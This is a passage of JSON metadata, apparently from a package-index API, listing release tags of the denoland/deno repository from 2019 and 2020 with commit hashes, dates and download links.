s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/